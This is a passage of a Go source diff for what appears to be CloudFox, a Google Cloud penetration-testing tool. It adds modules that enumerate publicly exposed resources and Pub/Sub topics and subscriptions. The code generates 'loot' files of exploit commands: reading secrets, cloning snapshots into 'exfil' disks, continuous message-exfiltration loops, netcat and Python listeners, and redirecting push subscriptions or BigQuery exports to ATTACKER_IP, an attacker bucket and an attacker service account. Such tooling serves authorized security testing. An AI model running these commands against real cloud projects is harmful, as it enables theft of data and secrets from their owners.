job.Location, + AccessLevel: "allUsers", // Indicates public source/sink + Role: "dataflow.worker", + AdditionalInfo: fmt.Sprintf("Type: %s, State: %s", job.Type, job.CurrentState), + } + m.addResource(resource) + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Dataflow jobs in project %s", projectID)) + } +} + +// hasPublicDataflowConfig checks if a Dataflow job has public-facing configurations +func hasPublicDataflowConfig(job *dataflow.Job) bool { + // Check job labels for signs of public data sources + if job.Labels != nil { + for key, value := range job.Labels { + if strings.Contains(strings.ToLower(key), "public") || + strings.Contains(strings.ToLower(value), "public") { + return true + } + } + } + // In practice, need to check the pipeline options for public sources + // This is a placeholder - full implementation would parse job graph + return false +} + +// getClusterState safely extracts cluster state, handling nil Status +func getClusterState(cluster *dataproc.Cluster) string { + if cluster.Status != nil { + return cluster.Status.State + } + return "UNKNOWN" +} + +// checkDataprocClusters checks Dataproc clusters for public access +func (m *PublicAccessModule) checkDataprocClusters(ctx context.Context, projectID string, logger internal.Logger) { + dpService, err := dataproc.NewService(ctx) + if err != nil { + return + } + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + for _, region := range regions { + parent := fmt.Sprintf("projects/%s/regions/%s", projectID, region) + req := dpService.Projects.Regions.Clusters.List(projectID, region) + err := req.Pages(ctx, func(page *dataproc.ListClustersResponse) error { + for _, cluster := range page.Clusters { + // Get IAM policy for cluster + policyReq := &dataproc.GetIamPolicyRequest{} + policy, err := 
dpService.Projects.Regions.Clusters.GetIamPolicy(parent+"/clusters/"+cluster.ClusterName, policyReq).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Dataproc Cluster", + ResourceName: cluster.ClusterName, + ProjectID: projectID, + Location: region, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Status: %s", getClusterState(cluster)), + } + m.addResource(resource) + } + } + } + } + return nil + }) + if err != nil { + // Don't fail on region errors, continue + continue + } + } +} + +// checkNotebooks checks Vertex AI Workbench notebooks for public access +func (m *PublicAccessModule) checkNotebooks(ctx context.Context, projectID string, logger internal.Logger) { + nbService, err := notebooks.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := nbService.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListInstancesResponse) error { + for _, instance := range page.Instances { + // Get IAM policy for notebook instance + policy, err := nbService.Projects.Locations.Instances.GetIamPolicy(instance.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + location := publicAccessExtractLocation(instance.Name) + resource := PublicResource{ + ResourceType: "Notebook Instance", + ResourceName: publicAccessExtractResourceName(instance.Name), + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("State: %s, Machine: %s", instance.State, instance.MachineType), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, 
globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list notebooks in project %s", projectID)) + } +} + +// checkSourceRepos checks Cloud Source Repositories for public access +func (m *PublicAccessModule) checkSourceRepos(ctx context.Context, projectID string, logger internal.Logger) { + srService, err := sourcerepo.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s", projectID) + req := srService.Projects.Repos.List(parent) + err = req.Pages(ctx, func(page *sourcerepo.ListReposResponse) error { + for _, repo := range page.Repos { + // Get IAM policy for repo + policy, err := srService.Projects.Repos.GetIamPolicy(repo.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Source Repository", + ResourceName: publicAccessExtractResourceName(repo.Name), + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("URL: %s", repo.Url), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list source repos in project %s", projectID)) + } +} + +// addResource adds a public resource to the list thread-safely +func (m *PublicAccessModule) addResource(resource PublicResource) { + m.mu.Lock() + defer m.mu.Unlock() + m.ProjectPublicResources[resource.ProjectID] = append(m.ProjectPublicResources[resource.ProjectID], resource) + m.addResourceToLoot(resource, resource.ProjectID) +} + +// getAllPublicResources aggregates all public resources across projects +func (m *PublicAccessModule) getAllPublicResources() []PublicResource { + var allResources []PublicResource + for _, resources := range m.ProjectPublicResources { + allResources = append(allResources, resources...) 
+ } + return allResources +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PublicAccessModule) addResourceToLoot(resource PublicResource, projectID string) { + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# [%s] %s: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Access: %s\n"+ + "# Role: %s\n", + resource.AccessLevel, + resource.ResourceType, + resource.ResourceName, + resource.ProjectID, + resource.AccessLevel, + resource.Role, + ) + + // Add type-specific commands + m.LootMap[projectID]["public-access-commands"].Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + switch resource.ResourceType { + case "Cloud Storage": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n"+ + "gsutil cp gs://%s/FILE ./\n\n", + resource.ResourceName, resource.ResourceName) + case "Compute Snapshot": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud compute disks create exfil-disk --source-snapshot=projects/%s/global/snapshots/%s --zone=us-central1-a\n\n", + resource.ProjectID, resource.ResourceName) + case "Compute Image": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud compute instances create exfil-vm --image=projects/%s/global/images/%s --zone=us-central1-a\n\n", + resource.ProjectID, resource.ResourceName) + case "BigQuery Dataset", "BigQuery Table": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s` LIMIT 100'\n\n", + resource.ProjectID, resource.ResourceName) + case "Cloud Run": + if strings.Contains(resource.AdditionalInfo, "URL:") { + url := strings.TrimPrefix(resource.AdditionalInfo, "URL: ") + 
m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "curl -v %s\n\n", url) + } + case "Cloud Function": + if strings.Contains(resource.AdditionalInfo, "URL:") { + parts := strings.Split(resource.AdditionalInfo, ",") + if len(parts) > 0 { + url := strings.TrimPrefix(parts[0], "URL: ") + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "curl -v %s\n\n", url) + } + } + case "Pub/Sub Topic": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud pubsub topics publish %s --message='test' --project=%s\n\n", + resource.ResourceName, resource.ProjectID) + case "Pub/Sub Subscription": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud pubsub subscriptions pull %s --auto-ack --project=%s\n\n", + resource.ResourceName, resource.ProjectID) + case "Secret Manager": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud secrets versions access latest --secret=%s --project=%s\n\n", + resource.ResourceName, resource.ProjectID) + case "Artifact Registry": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n\n", + resource.Location, resource.ProjectID, resource.ResourceName) + case "Cloud KMS": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public KMS key access!\n"+ + "gcloud kms keys describe %s --keyring=KEYRING --location=%s --project=%s\n"+ + "# If encrypt role: can encrypt data with this key\n"+ + "# If decrypt role: can decrypt data encrypted with this key\n\n", + resource.ResourceName, resource.Location, resource.ProjectID) + case "Spanner Instance", "Spanner Database": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Spanner access!\n"+ + "gcloud spanner databases list --instance=%s --project=%s\n"+ + "gcloud spanner databases execute-sql DATABASE --instance=%s 
--sql='SELECT * FROM TableName LIMIT 10' --project=%s\n\n", + resource.ResourceName, resource.ProjectID, resource.ResourceName, resource.ProjectID) + case "Dataproc Cluster": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Dataproc cluster!\n"+ + "gcloud dataproc clusters describe %s --region=%s --project=%s\n"+ + "gcloud dataproc jobs list --cluster=%s --region=%s --project=%s\n\n", + resource.ResourceName, resource.Location, resource.ProjectID, + resource.ResourceName, resource.Location, resource.ProjectID) + case "Notebook Instance": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Notebook instance!\n"+ + "gcloud notebooks instances describe %s --location=%s --project=%s\n"+ + "# Get proxy URL to access notebook\n\n", + resource.ResourceName, resource.Location, resource.ProjectID) + case "Source Repository": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Source Repository!\n"+ + "gcloud source repos clone %s --project=%s\n"+ + "# Clone and examine source code\n\n", + resource.ResourceName, resource.ProjectID) + default: + m.LootMap[projectID]["public-access-commands"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PublicAccessModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PublicAccessModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + pathBuilder := m.BuildPathBuilder() + + // Build per-project output data + projectLevelData := make(map[string]internal.CloudfoxOutput) + + for projectID, resources := range m.ProjectPublicResources { + header := []string{ + "Resource Type", + "Resource Name", + "Location", + "Access Level", + "Public Role", + "Size", + 
"Additional Info", + } + + var body [][]string + for _, r := range resources { + location := r.Location + if location == "" { + location = "global" + } + size := r.Size + if size == "" { + size = "-" + } + + body = append(body, []string{ + r.ResourceType, + r.ResourceName, + location, + r.AccessLevel, + r.Role, + size, + r.AdditionalInfo, + }) + } + + // Collect loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{} + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-access", + Header: header, + Body: body, + }) + } + + projectLevelData[projectID] = PublicAccessOutput{ + Table: tables, + Loot: lootFiles, + } + } + + outputData := internal.HierarchicalOutputData{ + ProjectLevelData: projectLevelData, + } + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PUBLICACCESS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *PublicAccessModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllPublicResources() + + header := []string{ + "Project ID", + "Project Name", + "Resource Type", + "Resource Name", + "Location", + "Access Level", + "Public Role", + "Size", + "Additional Info", + } + + var body [][]string + for _, r := range allResources { + location := r.Location + if location == "" { + location = "global" + } + size := r.Size + if size == "" { + size = "-" + } + + body = append(body, []string{ + r.ProjectID, + m.GetProjectName(r.ProjectID), + r.ResourceType, + r.ResourceName, + location, + r.AccessLevel, + r.Role, + size, + 
r.AdditionalInfo, + }) + } + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{} + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-access", + Header: header, + Body: body, + }) + } + + output := PublicAccessOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBLICACCESS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ + +func publicAccessExtractResourceName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func publicAccessExtractLocation(fullName string) string { + // Format: projects/PROJECT/locations/LOCATION/... 
+ parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +func publicAccessFormatBytes(bytes int64) string { + if bytes == 0 { + return "-" + } + const unit = 1024 + if bytes < unit { + return fmt.Sprintf("%d B", bytes) + } + div, exp := int64(unit), 0 + for n := bytes / unit; n >= unit; n /= unit { + div *= unit + exp++ + } + return fmt.Sprintf("%.1f %cB", float64(bytes)/float64(div), "KMGTPE"[exp]) +} diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go new file mode 100644 index 00000000..3bdef915 --- /dev/null +++ b/gcp/commands/pubsub.go @@ -0,0 +1,922 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + PubSubService "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPubSubCommand = &cobra.Command{ + Use: globals.GCP_PUBSUB_MODULE_NAME, + Aliases: []string{"ps", "topics", "subscriptions"}, + Short: "Enumerate Pub/Sub topics and subscriptions with security analysis", + Long: `Enumerate Pub/Sub topics and subscriptions across projects with security-relevant details. 
+ +Features: +- Lists all Pub/Sub topics and subscriptions +- Shows IAM configuration and public access +- Identifies push endpoints and their configurations +- Shows dead letter topics and retry policies +- Detects BigQuery and Cloud Storage exports +- Generates gcloud commands for further analysis + +Security Columns: +- PublicPublish: Whether allUsers/allAuthenticatedUsers can publish +- PublicSubscribe: Whether allUsers/allAuthenticatedUsers can subscribe +- KMS: Customer-managed encryption key status +- PushEndpoint: External URL receiving messages (data exfiltration risk) +- Exports: BigQuery/Cloud Storage export destinations + +Attack Surface: +- Public topics allow message injection +- Public subscriptions allow message reading +- Push endpoints may leak sensitive data +- Cross-project subscriptions indicate trust relationships`, + Run: runGCPPubSubCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PubSubModule struct { + gcpinternal.BaseGCPModule + + ProjectTopics map[string][]PubSubService.TopicInfo // projectID -> topics + ProjectSubscriptions map[string][]PubSubService.SubscriptionInfo // projectID -> subscriptions + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PubSubOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PubSubOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PubSubOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPubSubCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBSUB_MODULE_NAME) + if err != nil { + return + } + + module := &PubSubModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + 
ProjectTopics: make(map[string][]PubSubService.TopicInfo), + ProjectSubscriptions: make(map[string][]PubSubService.SubscriptionInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBSUB_MODULE_NAME, m.processProject) + + allTopics := m.getAllTopics() + allSubs := m.getAllSubscriptions() + + totalResources := len(allTopics) + len(allSubs) + if totalResources == 0 { + logger.InfoM("No Pub/Sub topics or subscriptions found", globals.GCP_PUBSUB_MODULE_NAME) + return + } + + // Count public resources and push subscriptions + publicTopics := 0 + publicSubs := 0 + pushSubs := 0 + for _, topic := range allTopics { + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicTopics++ + break + } + } + } + for _, sub := range allSubs { + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicSubs++ + break + } + } + if sub.PushEndpoint != "" { + pushSubs++ + } + } + + msg := fmt.Sprintf("Found %d topic(s), %d subscription(s)", len(allTopics), len(allSubs)) + if publicTopics > 0 || publicSubs > 0 { + msg += fmt.Sprintf(" (%d public topics, %d public subs)", publicTopics, publicSubs) + } + if pushSubs > 0 { + msg += fmt.Sprintf(" [%d push endpoints]", pushSubs) + } + logger.SuccessM(msg, globals.GCP_PUBSUB_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllTopics returns all topics from all projects +func (m *PubSubModule) getAllTopics() []PubSubService.TopicInfo { + var all []PubSubService.TopicInfo + for _, topics := range m.ProjectTopics { + all = append(all, topics...) 
+ } + return all +} + +// getAllSubscriptions returns all subscriptions from all projects +func (m *PubSubModule) getAllSubscriptions() []PubSubService.SubscriptionInfo { + var all []PubSubService.SubscriptionInfo + for _, subs := range m.ProjectSubscriptions { + all = append(all, subs...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PubSubModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Pub/Sub in project: %s", projectID), globals.GCP_PUBSUB_MODULE_NAME) + } + + ps := PubSubService.New() + + var topics []PubSubService.TopicInfo + var subs []PubSubService.SubscriptionInfo + + // Get topics + topicsResult, err := ps.Topics(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub topics in project %s", projectID)) + } else { + topics = topicsResult + } + + // Get subscriptions + subsResult, err := ps.Subscriptions(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub subscriptions in project %s", projectID)) + } else { + subs = subsResult + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectTopics[projectID] = topics + m.ProjectSubscriptions[projectID] = subs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["pubsub-commands"] = &internal.LootFile{ + Name: "pubsub-commands", + Contents: "# Pub/Sub Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, topic := range topics { + m.addTopicToLoot(projectID, topic) + } + for _, sub := range subs { + 
m.addSubscriptionToLoot(projectID, sub) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d topic(s), %d subscription(s) in project %s", len(topics), len(subs), projectID), globals.GCP_PUBSUB_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PubSubModule) addTopicToLoot(projectID string, topic PubSubService.TopicInfo) { + lootFile := m.LootMap[projectID]["pubsub-commands"] + if lootFile == nil { + return + } + + // Check for public access + publicAccess := "" + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicAccess = " [PUBLIC ACCESS]" + break + } + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# TOPIC: %s%s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Subscriptions: %d\n", + topic.Name, publicAccess, + topic.ProjectID, topic.SubscriptionCount, + ) + + if topic.KmsKeyName != "" { + lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", topic.KmsKeyName) + } + + if topic.SchemaSettings != "" { + lootFile.Contents += fmt.Sprintf("# Schema: %s\n", topic.SchemaSettings) + } + + if len(topic.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range topic.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe topic +gcloud pubsub topics describe %s --project=%s + +# Get IAM policy +gcloud pubsub topics get-iam-policy %s --project=%s + +# List all subscriptions for this topic +gcloud pubsub topics list-subscriptions %s --project=%s + +# List snapshots for this topic +gcloud pubsub snapshots list --filter="topic:%s" --project=%s + +# === EXPLOIT COMMANDS === + +# Publish 
a test message (requires pubsub.topics.publish) +gcloud pubsub topics publish %s --message='{"test": "message"}' --project=%s + +# Publish message with attributes +gcloud pubsub topics publish %s --message='test' --attribute='key1=value1,key2=value2' --project=%s + +# Publish from file +# echo '{"sensitive": "data"}' > message.json +# gcloud pubsub topics publish %s --message="$(cat message.json)" --project=%s + +# === ATTACK SCENARIOS === + +# Message Injection: If you can publish, inject malicious messages +# gcloud pubsub topics publish %s --message='{"cmd": "malicious_command"}' --project=%s + +# Create a new subscription to eavesdrop on messages (requires pubsub.subscriptions.create) +# gcloud pubsub subscriptions create attacker-sub-%s --topic=%s --project=%s + +# === NETCAT / WEBHOOK CAPTURE === + +# Step 1: Start a listener on your attacker host (e.g., a VM with a public IP) +# nc -lk 4444 +# Or use a simple HTTP server to see full requests: +# python3 -c "from http.server import HTTPServer, BaseHTTPRequestHandler; import json +# class H(BaseHTTPRequestHandler): +# def do_POST(self): +# data = self.rfile.read(int(self.headers['Content-Length'])) +# print(json.dumps({'headers': dict(self.headers), 'body': data.decode()}, indent=2)) +# self.send_response(200); self.end_headers() +# HTTPServer(('0.0.0.0', 8080), H).serve_forever()" + +# Step 2: Create a push subscription pointed at your listener (requires pubsub.subscriptions.create) +# gcloud pubsub subscriptions create exfil-sub-%s --topic=%s --project=%s --push-endpoint="https://ATTACKER_IP:8080/capture" + +# All new messages published to this topic will be POSTed to your listener as JSON +# The message body is base64-encoded in the POST payload under .message.data + +`, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, 
topic.ProjectID, + topic.Name, topic.Name, topic.ProjectID, + topic.Name, topic.Name, topic.ProjectID, + ) +} + +func (m *PubSubModule) addSubscriptionToLoot(projectID string, sub PubSubService.SubscriptionInfo) { + lootFile := m.LootMap[projectID]["pubsub-commands"] + if lootFile == nil { + return + } + + // Check for public access + publicAccess := "" + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicAccess = " [PUBLIC ACCESS]" + break + } + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# SUBSCRIPTION: %s%s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# Topic: %s\n", + sub.Name, publicAccess, + sub.ProjectID, sub.Topic, + ) + + // Cross-project info + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + lootFile.Contents += fmt.Sprintf("# Cross-Project: Yes (topic in %s)\n", sub.TopicProject) + } + + // Subscription type + subType := "Pull" + if sub.PushEndpoint != "" { + subType = "Push" + } else if sub.BigQueryTable != "" { + subType = "BigQuery Export" + } else if sub.CloudStorageBucket != "" { + subType = "Cloud Storage Export" + } + lootFile.Contents += fmt.Sprintf("# Type: %s\n", subType) + + // Push endpoint info + if sub.PushEndpoint != "" { + lootFile.Contents += fmt.Sprintf( + "# Push Endpoint: %s\n"+ + "# Push Service Account: %s\n", + sub.PushEndpoint, + sub.PushServiceAccount, + ) + } + + // Export destinations + if sub.BigQueryTable != "" { + lootFile.Contents += fmt.Sprintf("# BigQuery Export: %s\n", sub.BigQueryTable) + } + if sub.CloudStorageBucket != "" { + lootFile.Contents += fmt.Sprintf("# GCS Export: %s\n", sub.CloudStorageBucket) + } + + // Dead letter config + if sub.DeadLetterTopic != "" { + lootFile.Contents += fmt.Sprintf( + "# Dead Letter Topic: %s (Max Attempts: %d)\n", + sub.DeadLetterTopic, + sub.MaxDeliveryAttempts, + 
) + } + + // Filter + if sub.Filter != "" { + lootFile.Contents += fmt.Sprintf("# Filter: %s\n", sub.Filter) + } + + // IAM bindings + if len(sub.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range sub.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe subscription +gcloud pubsub subscriptions describe %s --project=%s + +# Get IAM policy +gcloud pubsub subscriptions get-iam-policy %s --project=%s + +# List snapshots for this subscription +gcloud pubsub snapshots list --project=%s + +# === EXPLOIT COMMANDS === + +# Pull messages WITHOUT acknowledging (peek at messages, they stay in queue) +gcloud pubsub subscriptions pull %s --project=%s --limit=100 + +# Pull and acknowledge messages (removes them from queue - destructive!) +gcloud pubsub subscriptions pull %s --project=%s --limit=100 --auto-ack + +# Pull messages with wait (useful for real-time monitoring) +# gcloud pubsub subscriptions pull %s --project=%s --limit=10 --wait + +# === MESSAGE EXFILTRATION === + +# Continuous message pulling loop (exfiltrate all messages) +# while true; do gcloud pubsub subscriptions pull %s --project=%s --limit=100 --auto-ack --format=json >> exfiltrated_messages.json; sleep 1; done + +# Pull and save to file +# gcloud pubsub subscriptions pull %s --project=%s --limit=1000 --format=json > messages.json + +# === NETCAT / WEBHOOK CAPTURE === + +# Convert this subscription to push mode and redirect messages to your listener (requires pubsub.subscriptions.update) +# Step 1: Start a listener on your attacker host +# nc -lk 4444 +# Or use a Python HTTP server: +# python3 -c "from http.server import HTTPServer, BaseHTTPRequestHandler; import json +# class H(BaseHTTPRequestHandler): +# def do_POST(self): +# data = self.rfile.read(int(self.headers['Content-Length'])) +# print(json.dumps({'headers': dict(self.headers), 
'body': data.decode()}, indent=2)) +# self.send_response(200); self.end_headers() +# HTTPServer(('0.0.0.0', 8080), H).serve_forever()" +# Step 2: Set push endpoint on this subscription +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="https://ATTACKER_IP:8080/capture" +# Messages will be POSTed as JSON with base64-encoded data in .message.data + +# === SNAPSHOT & SEEK ATTACKS === + +# Create a snapshot of current subscription state (requires pubsub.snapshots.create) +# gcloud pubsub snapshots create snapshot-%s --subscription=%s --project=%s + +# Seek to beginning of retention period (replay all retained messages) +# gcloud pubsub subscriptions seek %s --time="2024-01-01T00:00:00Z" --project=%s + +# Seek to a snapshot (replay messages from snapshot point) +# gcloud pubsub subscriptions seek %s --snapshot=snapshot-%s --project=%s + +`, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.Name, sub.ProjectID, + ) + + // Push endpoint specific attacks + if sub.PushEndpoint != "" { + lootFile.Contents += fmt.Sprintf(`# === PUSH ENDPOINT ATTACKS === + +# Current push endpoint: %s +# Push SA: %s + +# Redirect messages to attacker listener (requires pubsub.subscriptions.update) +# Step 1: Start listener: nc -lk 4444 (or python3 HTTP server on port 8080) +# Step 2: Modify push endpoint: +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="https://ATTACKER_IP:8080/capture" + +# Remove push config (convert to pull subscription for easier exfiltration) +# gcloud pubsub subscriptions modify-push-config %s --project=%s --push-endpoint="" + +# Change push authentication (OIDC token attack) +# gcloud pubsub subscriptions modify-push-config %s --project=%s 
--push-endpoint="%s" --push-auth-service-account="attacker-sa@attacker-project.iam.gserviceaccount.com" + +`, + sub.PushEndpoint, sub.PushServiceAccount, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, sub.PushEndpoint, + ) + } + + // BigQuery export attacks + if sub.BigQueryTable != "" { + lootFile.Contents += fmt.Sprintf(`# === BIGQUERY EXPORT ATTACKS === + +# Current export table: %s + +# Query exported messages from BigQuery +bq query --use_legacy_sql=false 'SELECT * FROM %s LIMIT 1000' + +# Export BigQuery table to GCS for bulk download +# bq extract --destination_format=NEWLINE_DELIMITED_JSON '%s' gs://attacker-bucket/exported_messages/*.json + +# Show table schema (understand message structure) +bq show --schema %s + +`, + sub.BigQueryTable, + strings.Replace(sub.BigQueryTable, ":", ".", 1), + sub.BigQueryTable, + sub.BigQueryTable, + ) + } + + // GCS export attacks + if sub.CloudStorageBucket != "" { + lootFile.Contents += fmt.Sprintf(`# === CLOUD STORAGE EXPORT ATTACKS === + +# Current export 